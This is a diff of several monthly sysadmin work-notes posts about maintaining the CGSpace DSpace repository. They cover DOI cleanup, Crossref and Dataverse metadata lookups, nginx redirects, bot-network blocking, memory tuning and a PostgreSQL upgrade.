## 2024-04-16
- Spend some time looking at duplicate DOIs again...
- Assist Deborah with an advanced query on CGSpace for biodiversity and health:
```
dcterms.issued:[2010 TO 2024] AND dcterms.type:"Journal Article" AND (dc.title:"biodiversity" OR dcterms.subject:"biodiversity" OR dc.title:"health" OR dcterms.subject:"health")
```
- Remove CIMMYT URLs and citations from 277 journal articles on CGSpace since it is a bit tacky
- I used this Jython expression in OpenRefine with [Crossref's content negotiation](https://citation.crosscite.org/docs.html) to get citations for all DOIs:
```python
import urllib2
doi = cells['cg.identifier.doi[en_US]'].value
url = "https://api.crossref.org/works/" + doi + "/transform/text/x-bibliography"
useragent = "Python (mailto:a.o@cgiar.org)"
request = urllib2.Request(url.encode("utf-8"), headers={"User-Agent" : useragent})
get = urllib2.urlopen(request)
return get.read().decode('utf-8')
```
- It took ten or so minutes for it to finish (and note this is Python 2 inside OpenRefine so I had to be careful with Unicode), but worked well!
## 2024-04-18
- Write a SQL query to build the IFPRI CONTENTdm redirects to Handles:
```sql
SELECT m.text_value, h.handle FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=28 AND m.text_value LIKE 'Original URL%' AND h.resource_type_id=2;
```
- Similarly, I need a SQL query to get the redirects for duplicate Handles, querying for `dcterms.replaces`:
```sql
SELECT m.text_value AS handle_from, h.handle AS handle_to FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=181 AND h.resource_type_id=2;
```
- Then I can work that list into an nginx map with redirect, for example:
```console
server {
    ...
    if ($new_uri) {
        return 301 $new_uri;
    }
}

map $request_uri $new_uri {
    /handle/10568/112821 /handle/10568/97605;
}
```
## 2024-04-19
- Spend some time looking at duplicate DOIs again...
- Refresh ORCID identifiers from ORCID API and update CGSpace metadata and controlled vocabulary
## 2024-04-20
- I read an [interesting thread about DOI casing](https://github.com/greenelab/scihub/issues/9)
- Apparently the DOI specification says ASCII characters in DOIs are case insensitive
- Indeed, [Crossref recommends lower case](https://www.crossref.org/documentation/member-setup/constructing-your-dois/) for all DOIs
- I was curious about the DOIs in our database so I checked before and after lower casing:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=220 AND text_value IS NOT NULL AND text_value !='') TO /tmp/dois-sql-before.txt;
COPY 25675
localhost/dspace7= ☘ \COPY (SELECT DISTINCT(lower(text_value)) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=220 AND text_value IS NOT NULL AND text_value !='') TO /tmp/dois-sql-after.txt;
COPY 25666
```
- I need to investigate options for lower casing these in the repository, for example in a curation task, and in all workflows around DSpace metadata...
## 2024-04-23
- Spent some time writing a Java curation task to normalize DOIs in items when they enter the workflow edit step
- The workflow curation tasks are not documented very well but I got a basic configuration working
- I found a bug in DSpace curation tasks and discussed on Slack
- I finalized the `NormalizeDOIs` curation task and released v7.6.1.1 of the [cgspace-java-helpers](https://github.com/ilri/cgspace-java-helpers) project
## 2024-04-24
- A bit more testing of the curation tasks
- I tested a patch by Mark Wood
- I added support for normalizing DOIs to this same format to my [csv-metadata-quality](https://github.com/ilri/csv-metadata-quality) project
## 2024-04-25
- I lowercased the remaining 3,900 DOIs on CGSpace that had uppercase ASCII characters
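- In PostgreSQL this can be done with the same pattern as the AGROVOC lower casing, something like:
```console
dspace=# BEGIN;
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=220 AND text_value ~ '[[:upper:]]';
dspace=*# COMMIT;
```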
- Spend some time looking at duplicate DOIs again...
## 2024-04-26
- Spend some time looking at duplicate DOIs again...
## 2024-04-29
- Start working on the IFPRI 2020–2021 batch migration
- I modified my `check_duplicates.py` script to check for DOIs instead of titles, and use a similarity of 1.0 to make sure the match is exact
- I noticed something in the Tomcat log:
```console
tomcat9[690]: WARNING: The HTTP response header [Content-Disposition] with value [attachment; filename="Literature review on Women’s Empowerment and their Resilience2.pdf"] has been removed from the response because it is invalid
tomcat9[690]: java.lang.IllegalArgumentException: The Unicode character [’] at code point [8,217] cannot be encoded as it is outside the permitted range of 0 to 255
```
- I found the bitstream's ID and then used the `ds6_bitstream2itemhandle` [SQL helper function](https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+6) to find the item's handle
- Then I replaced the curly quote with a regular quote in all bitstreams
<!-- vim: set sw=2 ts=2: -->

197
content/posts/2024-05.md Normal file

@ -0,0 +1,197 @@
---
title: "May, 2024"
date: 2024-05-01T10:39:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-05-01
- I dumped all the CGSpace DOIs and resolved them with my `crossref_doi_lookup.py` script
- Then I did some work to add missing abstracts (about 900!), volumes, issues, licenses, publishers, and types, etc
<!--more-->
## 2024-05-05
- Spend some time looking at duplicate DOIs again...
## 2024-05-06
- Spend some time looking at duplicate DOIs again...
## 2024-05-07
- Discuss RSS feeds and OpenSearch with IWMI
- It seems our OpenSearch feed settings are using the defaults, so I need to copy some of those over from our old DSpace 6 branch
- I saw a patch for an interesting issue on DSpace GitHub: [Error submitting or deleting items - URI too long when user is in a large number of groups](https://github.com/DSpace/DSpace/issues/9544)
- I hadn't realized it, but we have lots of those errors:
```console
$ zstdgrep -a 'URI Too Long' log/dspace.log-2024-04-* | wc -l
1423
```
- Spend some time looking at duplicate DOIs again...
## 2024-05-08
- Spend some time looking at duplicate DOIs again...
- I finally finished looking at the duplicate DOIs for journal articles
- I updated the list of handle redirects and there are 386 of them!
## 2024-05-09
- Spend some time working on the IFPRI 2020–2021 batch
- I started by checking for exact duplicates (1.0 similarity) using DOI, type, and issue date
## 2024-05-12
- I couldn't figure out how to do a complex join on withdrawn items along with their metadata, so I pulled out a few fields like titles, handles, and provenance separately:
```psql
dspace=# \COPY (SELECT i.uuid, m.text_value AS uri FROM item i JOIN metadatavalue m ON i.uuid = m.dspace_object_id WHERE withdrawn AND m.metadata_field_id=25) TO /tmp/withdrawn-handles.csv CSV HEADER;
dspace=# \COPY (SELECT i.uuid, m.text_value AS title FROM item i JOIN metadatavalue m ON i.uuid = m.dspace_object_id WHERE withdrawn AND m.metadata_field_id=64) TO /tmp/withdrawn-titles.csv CSV HEADER;
dspace=# \COPY (SELECT i.uuid, m.text_value AS submitted_by FROM item i JOIN metadatavalue m ON i.uuid = m.dspace_object_id WHERE withdrawn AND m.metadata_field_id=28 AND m.text_value LIKE 'Submitted by%') TO /tmp/withdrawn-submitted-by.csv CSV HEADER;
```
- Then joined them:
```console
$ csvjoin -c uuid /tmp/withdrawn-titles.csv /tmp/withdrawn-handles.csv /tmp/withdrawn-submitted-by.csv > /tmp/withdrawn.csv
```
- This gives me an insight into who submitted 334 of the duplicates over the past few years...
- I fixed a few hundred titles with leading/trailing whitespace, newlines, and ligatures like ﬀ, ﬁ, ﬂ, ﬃ, and ﬄ
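- One way to fix the ligatures in PostgreSQL is a `replace()` per glyph on the title field, for example:
```console
dspace=# UPDATE metadatavalue SET text_value=replace(text_value, 'ﬁ', 'fi') WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value LIKE '%ﬁ%';
```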
## 2024-05-13
- Export a list of IFPRI information products with handle links and CONTENTdm links:
```
$ csvgrep -c 'dc.description.provenance[en_US]' -m 'CONTENTdm' cgspace.csv \
| csvcut -c 'id,dc.description.provenance[en_US],dc.identifier.uri[en_US]' \
| tee /tmp/ifpri-redirects.csv \
| csvstat --count
2645
```
- I discovered the `/server/api/pid/find` endpoint today, which is much more direct and manageable than the `/server/api/discover/search/objects?query=` endpoint when trying to get metadata for a Handle (item, collection, or community)
- The "pid" stands for permanent identifiers apparently, and we can use it like this:
```
https://dspace7test.ilri.org/server/api/pid/find?id=10568/118424
```
## 2024-05-15
- I got journal titles for 2,900 journal articles that were missing them from Crossref
## 2024-05-16
Helping IFPRI with some DSpace 7 API support; these are two queries for items issued in 2024:
- https://dspace7test.ilri.org/server/api/discover/search/objects?query=dcterms.issued:2024
- https://dspace7test.ilri.org/server/api/discover/search/objects?query=dcterms.issued_dt%3A%5B2024-01-01T00%3A00%3A00Z%20TO%20%2A%5D — note the Lucene search syntax is URL encoded version of `:[2024-01-01T00:00:00Z TO *]`
Both of them return the same number of results and seem identical as far as I can see, but the second one uses Solr date indexes and requires the full Lucene datetime and range syntax
I wrote a new version of the `check_duplicates.py` script to help identify duplicates with different types
- Initially I called it `check_duplicates_fast.py` but it's actually not faster
- I need to find a way to deal with duplicates from IFPRI's repository because there are some mismatched types...
## 2024-05-20
Continue working through alternative duplicate matching for IFPRI
- Their item types are sometimes different than ours...
- One thing I think I can say for sure is that the default similarity factor in my script is 0.6, and I rarely see legitimate duplicates with such similarity so I might increase this to 0.7 to reduce the number of items I have to check
- Also, the difference in issue dates is currently 365, but I should reduce that a bit, perhaps to 270 days (9 months)
## 2024-05-22
- Finalize and upload the IFPRI 2020–2021 batch set
- I used a new technique to get missing licenses via Crossref (it's Python 2 because of OpenRefine's Jython):
```python
import urllib2
doi = cells['cg.identifier.doi[en_US]'].value
url = "https://api.crossref.org/works/" + doi
useragent = "Python (mailto:a.o@cgiar.org)"
request = urllib2.Request(url.encode("utf-8"), headers={"User-Agent" : useragent})
get = urllib2.urlopen(request)
return get.read().decode('utf-8')
```
## 2024-05-23
- Finalize last of the duplicates I found for the IFPRI 2020–2021 batch set (those that we missed initially due to mismatched types)
- Export a new list of IFPRI redirects from CONTENTdm:
```console
$ csvgrep -c 'dc.description.provenance[en_US]' -r 'Original URLs? from IFPRI CONTENTdm' cgspace.csv \
| csvcut -c 'id,dc.description.provenance[en_US],dc.identifier.uri[en_US]' \
| tee /tmp/ifpri-redirects.csv \
| csvstat --count
4004
```
I found a way to get abstracts from PLOS
- They offer an API that returns XML including the JATS-formatted abstracts
- I created a new column in OpenRefine by fetching specially crafted URLs based on the DOIs using this GREL:
```console
"https://journals.plos.org/plosone/article/file?id=" + cells['doi'].value + '&type=manuscript'
```
Then used `value.parseXml()` on the resulting text to extract the abstract's text:
```console
value.parseXml().select("abstract")[0].xmlText()
```
This doesn't preserve `<p>` tags though...
- Oh, nice, this does!
```console
forEach(value.parseHtml().select("abstract p"), i, i.htmlText()).join("\r\n\r\n")
```
For each paragraph inside an abstract, get the inner text and join them as one string separated by two newlines...
- Ah, some articles have multiple abstracts, for example: https://journals.plos.org/plosone/article/file?id=https://doi.org/10.1371/journal.pntd.0001859&type=manuscript
- I need to select the abstract that does **not** have any attributes (using [Jsoup selector syntax](https://jsoup.org/apidocs/org/jsoup/select/Selector.html))
```console
forEach(value.parseXml().select("abstract:not([*]) p"), i, i.xmlText()).join("\r\n\r\n")
```
Testing `xsv` (Rust) versus `csvkit` (Python) to filter all items with DOIs from a DSpace dump with 118,000 items:
```console
$ time xsv search -s doi 'doi\.org' /tmp/cgspace-minimal.csv | xsv select doi | xsv count
27339
xsv search -s doi 'doi\.org' /tmp/cgspace-minimal.csv 0.06s user 0.03s system 98% cpu 0.091 total
xsv select doi 0.02s user 0.02s system 40% cpu 0.091 total
xsv count 0.01s user 0.00s system 9% cpu 0.090 total
$ time csvgrep -c doi -m 'doi.org' /tmp/cgspace-minimal.csv | csvcut -c doi | csvstat --count
27339
csvgrep -c doi -m 'doi.org' /tmp/cgspace-minimal.csv 1.15s user 0.06s system 95% cpu 1.273 total
csvcut -c doi 0.42s user 0.05s system 36% cpu 1.283 total
csvstat --count 0.20s user 0.03s system 18% cpu 1.298 total
```
## 2024-05-27
- Working on IFPRI datasets batch migration
- 732 items total
- 6 duplicates on CGSpace
- 6 duplicates within set that need investigation
## 2024-05-28
- I'm thinking of increasing the frequency of thumbnail generation on CGSpace
- Currently the `dspace filter-media` script runs once at 3AM for all media types and seems to take ~10 minutes to run for all 118,000 items...
- I think I will make the thumbnailer run explicitly more often using `-p "ImageMagick PDF Thumbnail"`
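- For example, an extra cron entry (in `/etc/cron.d` style) that only runs the PDF thumbnail plugin; the schedule and DSpace path here are just placeholders:
```console
# Run the PDF thumbnailer every six hours, leaving the full 3AM filter-media run as is
0 */6 * * * dspace /home/dspace/bin/dspace filter-media -p "ImageMagick PDF Thumbnail" > /dev/null 2>&1
```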
<!-- vim: set sw=2 ts=2: -->

119
content/posts/2024-06.md Normal file

@ -0,0 +1,119 @@
---
title: "June, 2024"
date: 2024-06-03T14:14:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-06-03
- Working on IFPRI datasets
- I noticed the licenses were missing from Nilam's original file so I found a way to check [Dataverse's API for a persistent identifier](https://guides.dataverse.org/en/latest/api/native-api.html#export-metadata-of-a-dataset-in-various-formats)
- We have both Handles and DOIs for these datasets, both from Harvard's Dataverse
<!--more-->
- I used this GREL in OpenRefine to create a new column based on URLs using the DOI (uppercasing the DOI for Dataverse):
```
"https://dataverse.harvard.edu/api/datasets/export?exporter=dataverse_json&persistentId=doi:" + value.split('https://doi.org/')[-1].toUppercase()
```
- Then I was able to extract the license text from the JSON response using:
```
value.parseJson()['datasetVersion']['termsOfUse']
```
- Similar for the Handle...
## 2024-06-04
- Some Dataverse entries have the license in `['datasetVersion']['license']` instead...
- I finalized cleaning the 722 IFPRI datasets and uploaded them to CGSpace
## 2024-06-14
- Minor cleanups on IFPRI's 2016–2019 batch migration file
- I will start with duplicates on unique identifiers like DOIs
## 2024-06-18
- Merge and upload metadata for duplicates in IFPRI's 2016–2019 set:
- 144 exact match on CGSpace via DOI, type, and date
- 32 with CGSpace handles
- I also spent some time converting the `ilri/post_bitstreams.py` script to use the DSpace 7 REST API via dspace-rest-client
- There are 28 PDFs specified for these 176 duplicates, and a handful of them do not already exist on CGSpace so I will upload them
## 2024-06-19
- Spent some time checking the remaining 3,312 items in the IFPRI 2016–2019 migration set for duplicates on CGSpace
- There seem to be about 50 exact matches of title, type, and issue date
## 2024-06-20
- Finalize merging and uploading metadata for 48 duplicates from the IFPRI 2016–2019 migration set
- Heavy load on both CGSpace and DSpace 7 Test this afternoon
- Took me a while to figure out it was due to someone / something hammering `/search` for a bunch of facets
- The `pm2 logs` command was more useful than the nginx logs to see the requests at least, for example:
```
0|dspace-ui | GET /search?f.sdg=SDG%2013%20-%20Climate%20action,equals&spc.page=1&f.accessRights=Open%20Access,equals&f.dateIssued.min=2023&f.dateIssued.max=2024&f.country=Colombia,equals&f.subject=climate%20change,equals&f.region=Latin%20America%20and%20the%20Caribbean,equals&f.publisher=CGIAR%20FOCUS%20Climate%20Security,equals - - ms - -
1|dspace-ui | GET /search?f.accessRights=Open%20Access,equals&spc.page=1&f.sponsorship=CGIAR%20Trust%20Fund,equals&f.impactArea=Climate%20adaptation%20and%20mitigation,equals&f.region=Eastern%20Africa,equals&f.publisher=International%20Institute%20of%20Tropical%20Agriculture,equals - - ms - -
3|dspace-ui | GET /search?f.sdg=SDG%2013%20-%20Climate%20action,equals&f.sdg=SDG%2012%20-%20Responsible%20consumption%20and%20production,equals&spc.page=1&f.affiliation=CGIAR%20Research%20Program%20on%20Climate%20Change,%20Agriculture%20and%20Food%20Security,equals&f.affiliation=Alliance%20of%20Bioversity%20International%20and%20CIAT,equals&f.dateIssued.min=2020&f.dateIssued.max=2021&f.impactArea=Environmental%20health%20and%20biodiversity,equals - - ms - -
```
- Still difficult to find the client, because the logs are all [coming from Angular's user agent](https://github.com/DSpace/dspace-angular/issues/2902) and IP
- I changed the nginx logging to use the `X-Forwarded-For` header, as the `combined` log format uses `$remote_addr` by default, which is only accurate if the request doesn't come from Angular (ie directly to the API)
- From what I can see now the IPs are all coming from Huawei Cloud and Tencent
- The ASNs are AS136907 (Huawei) and AS132203 (Tencent)
- For now I will just add those to the list of bot networks
## 2024-06-21
- Update the nginx logging to use [nginx's `real_ip` module](http://nginx.org/en/docs/http/ngx_http_realip_module.html) to log the correct client IP
- I think this means we will start sending 'bot' to the Angular / Express frontend because bot IPs will be properly classified now...
- I will have to re-work or at least re-think that nginx configuration for requests going to the frontend because the proposed fix in https://github.com/DSpace/dspace-angular/issues/2902 is to pass on the client's user-agent
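- The `real_ip` part itself is small; a sketch, assuming the Angular SSR requests reach nginx from localhost:
```
# Trust the frontend's address and take the client IP from X-Forwarded-For
set_real_ip_from 127.0.0.1;
real_ip_header X-Forwarded-For;
real_ip_recursive on;
```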
- Then I updated the list of bot networks:
```console
$ wget https://asn.ipinfo.app/api/text/list/AS12876 \
https://asn.ipinfo.app/api/text/list/AS132203 \
https://asn.ipinfo.app/api/text/list/AS13238 \
https://asn.ipinfo.app/api/text/list/AS136907 \
https://asn.ipinfo.app/api/text/list/AS14061 \
https://asn.ipinfo.app/api/text/list/AS14618 \
https://asn.ipinfo.app/api/text/list/AS16276 \
https://asn.ipinfo.app/api/text/list/AS16509 \
https://asn.ipinfo.app/api/text/list/AS203020 \
https://asn.ipinfo.app/api/text/list/AS204287 \
https://asn.ipinfo.app/api/text/list/AS21859 \
https://asn.ipinfo.app/api/text/list/AS23576 \
https://asn.ipinfo.app/api/text/list/AS24940 \
https://asn.ipinfo.app/api/text/list/AS396982 \
https://asn.ipinfo.app/api/text/list/AS45102 \
https://asn.ipinfo.app/api/text/list/AS50245 \
https://asn.ipinfo.app/api/text/list/AS55286 \
https://asn.ipinfo.app/api/text/list/AS6939 \
https://asn.ipinfo.app/api/text/list/AS8075
$ cat AS* | ~/go/bin/mapcidr -a > /tmp/networks.txt
$ wc -l /tmp/networks.txt
8675 /tmp/networks.txt
```
- Update list of ORCID identifiers with new ones from Alliance and IFPRI
- Finalize uploading the remaining 3,264 items from IFPRI's 2016–2019 batch migration to CGSpace
## 2024-06-24
- Minor updates to [csv-metadata-quality](https://github.com/ilri/csv-metadata-quality) and [cgspace-java-helpers](https://github.com/ilri/cgspace-java-helpers) to normalize a few more invalid DOI formats
## 2024-06-25
- Work on uploading some missing PDFs from the IFPRI 2016–2019 batch migration
## 2024-06-26
- Did a big cleanup of several thousand journal articles based on metadata from Crossref
<!-- vim: set sw=2 ts=2: -->

57
content/posts/2024-07.md Normal file

@ -0,0 +1,57 @@
---
title: "July, 2024"
date: 2024-07-01T09:37:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-07-01
- A bit of work to clean up duplicate DOIs on CGSpace
- A handful of book chapters, working papers, and journal articles using the wrong DOI
- I tried to delete all users who have been inactive since six years ago (July 1, 2018):
<!--more-->
```console
$ dspace dsrun org.dspace.eperson.Groomer -a -b 07/01/2018 -d
```
- File an issue on DSpace GitHub: [Allow configuring disallowed domains for self registration](https://github.com/DSpace/DSpace/issues/9675)
## 2024-07-11
- Minor fixes to normalize the IFPRI CONTENTdm URLs in provenance fields:
```console
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value = replace(text_value, 'cdm/ref', 'digital') WHERE text_value LIKE '%CONTENTdm%cdm/ref/%';
UPDATE 1876
dspace=*# UPDATE metadatavalue SET text_value = replace(text_value, 'CONTENTdm: ', 'CONTENTdm: ') WHERE text_value LIKE '%CONTENTdm: %';
UPDATE 21
dspace=*# COMMIT;
COMMIT
```
- Then export a new list of CONTENTdm redirects, excluding withdrawn items:
```console
dspace= ☘ \COPY (SELECT m.text_value, h.handle FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=28 AND m.text_value LIKE '%URL from IFPRI CONTENTdm%' AND h.resource_type_id=2 AND m.dspace_object_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn)) to /tmp/ifpri.csv CSV HEADER;
COPY 8568
```
- Similarly, get a list of withdrawn item redirects:
```console
dspace= ☘ \COPY (SELECT m.text_value AS handle_from, h.handle AS handle_to FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=181 AND h.resource_type_id=2 AND h.resource_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn)) to /tmp/handle-redirects.csv CSV HEADER;
COPY 396
```
## 2024-07-18
- I experimented with adding a regular expression to validate DOIs to the submission form
- It is a slightly modified version of the one found here: https://stackoverflow.com/questions/27910/finding-a-doi-in-a-document-or-page
- I decided it will probably be confusing to people and will have limited benefit, since we are normalizing most forms of DOIs to our preferred form after submission anyway
<!-- vim: set sw=2 ts=2: -->

71
content/posts/2024-08.md Normal file

@ -0,0 +1,71 @@
---
title: "August, 2024"
date: 2024-08-08T23:07:00-07:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-08-08
- While working on the CGIAR Climate Change Synthesis I learned some new tricks with OpenRefine
<!--more-->
- The first was to retrieve affiliations from OpenAlex and extract them from JSON with this GREL:
```
forEach(
  value.parseJson()['authorships'],
  a,
  forEach(
    a.parseJson()['institutions'],
    i,
    i['display_name']
  ).join("||")
).join("||")
```
- It is a nested `forEach` to extract all institutions for all authors
- Second was a better way to deduplicate lists in Jython while preserving list order:
```python
# better dedupe preserves order
seen = set()
deduped_list = [x for x in value.split("||") if x not in seen and not seen.add(x)]
return "||".join(deduped_list)
```
## 2024-08-20
- Delete duplicate metadata values using the method I described in this GitHub issue: https://github.com/DSpace/DSpace/issues/8253#issuecomment-1331756418
## 2024-08-22
- Help IWMI with some OpenSearch RSS/Atom feeds for search results (see the URL-encoding sketch after this list):
- https://cgspace.cgiar.org/server/opensearch/search?query=affiliation:"International Water Management Institute" AND initiative:"Climate Resilience" AND subject:flooding
- https://cgspace.cgiar.org/server/opensearch/search?query=affiliation:"International Water Management Institute" AND initiative:"Climate Resilience" AND subject:drought
- https://cgspace.cgiar.org/server/opensearch/search?query=affiliation:"International Water Management Institute" AND initiative:"Climate Resilience" AND subject:landslides
- Export list of withdrawn handle redirects:
```
dspace=# \COPY (SELECT m.text_value AS handle_from, h.handle AS handle_to FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=181 AND h.resource_type_id=2 AND h.resource_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn)) to /tmp/handle-redirects.csv CSV HEADER;
COPY 400
```
- Export list of IFPRI CONTENTdm redirects:
```
dspace-# \COPY (SELECT m.text_value, h.handle FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=28 AND m.text_value LIKE '%URL from IFPRI CONTENTdm%' AND h.resource_type_id=2 AND m.dspace_object_id IN (SELECT uuid FROM item WHERE in_archive AND NOT withdrawn)) to /tmp/ifpri.csv CSV HEADER;
COPY 10794
```
- I filed [an issue](https://github.com/DSpace/dspace-angular/issues/3258) on DSpace Angular for anonymous users to be able to export search results to CSV
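- Note that the OpenSearch feed URLs above contain unencoded spaces and double quotes; a quick sketch of percent-encoding the query so the links are safe to paste elsewhere (the affiliation/initiative/subject values are the same ones from above):

```python
from urllib.parse import urlencode

base = "https://cgspace.cgiar.org/server/opensearch/search"
query = (
    'affiliation:"International Water Management Institute" '
    'AND initiative:"Climate Resilience" AND subject:flooding'
)

# urlencode percent-encodes the spaces and double quotes in the query
print(f"{base}?{urlencode({'query': query})}")
```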
## 2024-08-26
- Spent some time trying to rebase our DSpace Angular themes on top of the massive header/navbar rework from [DSpace 7.6.2](https://github.com/DSpace/dspace-angular/pull/2858)
- Spent some time getting missing bibliographic metadata (issue dates, licenses, pages, volume, issue, publisher, etc) from Crossref for CGSpace
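- Presumably this kind of lookup goes through the public Crossref REST API; a minimal sketch of a single-DOI lookup (not the exact script; the `mailto` address and example DOI are placeholders):

```python
import requests


def crossref_metadata(doi: str, mailto: str = "me@example.org") -> dict:
    """Fetch selected bibliographic fields for a DOI from the Crossref REST API."""
    # The mailto parameter puts requests in Crossref's "polite" pool
    r = requests.get(
        f"https://api.crossref.org/works/{doi}", params={"mailto": mailto}, timeout=30
    )
    r.raise_for_status()
    msg = r.json()["message"]
    return {
        "issued": msg.get("issued", {}).get("date-parts", [[None]])[0],
        "publisher": msg.get("publisher"),
        "volume": msg.get("volume"),
        "issue": msg.get("issue"),
        "pages": msg.get("page"),
        "license": (msg.get("license") or [{}])[0].get("URL"),
    }


# crossref_metadata("10.1234/example")  # hypothetical DOI
```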
<!-- vim: set sw=2 ts=2: -->

147
content/posts/2024-09.md Normal file
View File

@ -0,0 +1,147 @@
---
title: "September, 2024"
date: 2024-09-01T21:16:00-07:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-09-01
- Upgrade CGSpace to DSpace 7.6.2
<!--more-->
## 2024-09-05
- Finalize work on migrating DSpace Angular from Yarn to NPM
## 2024-09-06
- This morning Tomcat crashed due to an OOM kill:
```
Sep 06 00:00:24 server systemd[1]: tomcat9.service: A process of this unit has been killed by the OOM killer.
Sep 06 00:00:25 server systemd[1]: tomcat9.service: Main process exited, code=killed, status=9/KILL
Sep 06 00:00:25 server systemd[1]: tomcat9.service: Failed with result 'oom-kill'.
```
- According to the system journal, it was a Node.js dspace-angular process that tried to allocate memory and failed, thus invoking the OOM killer
- Currently I see high memory usage in those processes:
```console
$ pm2 status
┌────┬──────────────┬─────────────┬─────────┬─────────┬──────────┬────────┬──────┬───────────┬──────────┬──────────┬──────────┬──────────┐
│ id │ name │ namespace │ version │ mode │ pid │ uptime │ ↺ │ status │ cpu │ mem │ user │ watching │
├────┼──────────────┼─────────────┼─────────┼─────────┼──────────┼────────┼──────┼───────────┼──────────┼──────────┼──────────┼──────────┤
│ 0 │ dspace-ui │ default │ 7.6.3-… │ cluster │ 994 │ 4D │ 0 │ online │ 0% │ 3.4gb │ dspace │ disabled │
│ 1 │ dspace-ui │ default │ 7.6.3-… │ cluster │ 1015 │ 4D │ 0 │ online │ 0% │ 3.4gb │ dspace │ disabled │
│ 2 │ dspace-ui │ default │ 7.6.3-… │ cluster │ 1029 │ 4D │ 0 │ online │ 0% │ 3.4gb │ dspace │ disabled │
│ 3 │ dspace-ui │ default │ 7.6.3-… │ cluster │ 1042 │ 4D │ 0 │ online │ 0% │ 3.4gb │ dspace │ disabled │
└────┴──────────────┴─────────────┴─────────┴─────────┴──────────┴────────┴──────┴───────────┴──────────┴──────────┴──────────┴──────────┘
```
- I bet if I look in the logs I'd find some kind of heavy traffic on the frontend, causing high memory use from Angular SSR caching
## 2024-09-08
- Analyzing memory use in our DSpace hosts, which have 32GB of memory
- Effective cache of PostgreSQL is estimated at 11GB, which seems way high since the database is only 2GB
- Realistically this should be how we adjust, with PostgreSQL using ~8GB (or less) and each dspace-angular process pinned at 2GB...
> Total - Solr - Tomcat - Postgres - Nginx - Angular
> 31366 - (1024×4.4) - 7168 - (8×1024) - 512 - (4×2048) = 2796.4 left...
- I put some of these changes in on DSpace Test and will monitor this week
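- For my own sanity, the same arithmetic spelled out (all values in MB, same numbers as in the calculation above):

```python
# Back-of-the-envelope memory budget from the note above, in MB
total = 31366        # physical RAM reported on the host
solr = 1024 * 4.4    # Solr heap plus overhead
tomcat = 7168        # Tomcat / DSpace backend
postgres = 8 * 1024  # PostgreSQL
nginx = 512
angular = 4 * 2048   # four dspace-angular workers pinned at 2GB each

print(total - solr - tomcat - postgres - nginx - angular)  # ≈ 2796.4 left over
```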
## 2024-09-10
- Some bot in South Africa made a ton of requests on the API and made the load hit the roof:
```
# grep -E '10/Sep/2024:[10-11]' /var/log/nginx/api-access.log | awk '{print $1}' | sort | uniq -c | sort -h
...
149720 102.182.38.90
```
- They are using several user agents so are obviously a bot:
```
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
```
- I added them to the list of bot networks in nginx and the load went down
## 2024-09-11
- Upgrade DSpace 7 Test to Ubuntu 24.04
- I did some minor maintenance to test dspace-statistics-api with Python 3.12
- I tagged version 1.4.4 and released it on GitHub
## 2024-09-14
- Noticed a persistent higher than usual load on CGSpace and checked the server logs
- Found some new data center subnets to block because they were making thousands of requests with normal user agents
- I enabled HTTP/3 in nginx
- I enabled the SSR patch in Angular: https://github.com/DSpace/dspace-angular/issues/3110
## 2024-09-16
- Experiment with the [dspace-statistics-api-js](https://github.com/codeobia/dspace-statistics-api-js) on DSpace 7 Test
- In the past it always caused Solr to run out of memory, but I increased Solr's heap from 2g to 3g and it runs without crashing
- I attached VisualVM to Solr with a 3g and 4g heap and iterated over 1260 pages of results in the dspace-statistics-api-js:
![Solr with 3g heap](/cgspace-notes/2024/09/2024-09-16-Solr-3g-heap.png)
![Solr with 4g heap](/cgspace-notes/2024/09/2024-09-16-Solr-4g-heap.png)
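- A rough sketch of the kind of pagination loop used to generate that load (assuming the API exposes an `/items` endpoint with `page` and `limit` parameters like the Python dspace-statistics-api does, and a local instance listening on port 5000):

```python
import requests

BASE = "http://localhost:5000"  # assumed local dspace-statistics-api-js instance


def walk_items(pages: int = 1260, limit: int = 100) -> None:
    """Request every page of item statistics to put sustained load on Solr."""
    with requests.Session() as session:
        for page in range(pages):
            r = session.get(
                f"{BASE}/items", params={"page": page, "limit": limit}, timeout=60
            )
            r.raise_for_status()


walk_items()
```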
## 2024-09-23
- Upgrade PostgreSQL from version 14 to 15 on DSpace Test the same way I did last year:
```console
# apt update
# apt install postgresql-15
# Update configs with Ansible
# systemctl stop tomcat9
# pg_ctlcluster 14 main stop
# tar -cvzpf var-lib-postgresql-14.tar.gz /var/lib/postgresql/14
# tar -cvzpf etc-postgresql-14.tar.gz /etc/postgresql/14
# pg_ctlcluster 15 main stop
# pg_dropcluster 15 main
# pg_upgradecluster 14 main
# pg_ctlcluster 15 main start
...
ERROR: could not find function "xml_is_well_formed" in file "/usr/lib/postgresql/15/lib/pgxml.so"
ERROR: function public.xml_is_well_formed(text) does not exist
